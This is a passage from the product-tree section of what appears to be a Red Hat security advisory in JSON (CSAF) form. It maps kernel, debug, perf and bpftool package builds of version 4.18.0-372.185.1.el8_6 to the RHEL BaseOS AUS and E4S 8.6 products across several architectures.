          "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-doc-0:4.18.0-372.185.1.el8_6.noarch as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch"
        },
        "product_reference": "kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "perf-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "bpftool-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-0:4.18.0-372.185.1.el8_6.src as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src"
        },
        "product_reference": "kernel-0:4.18.0-372.185.1.el8_6.src",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch"
        },
        "product_reference": "kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-core-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-core-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-core-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
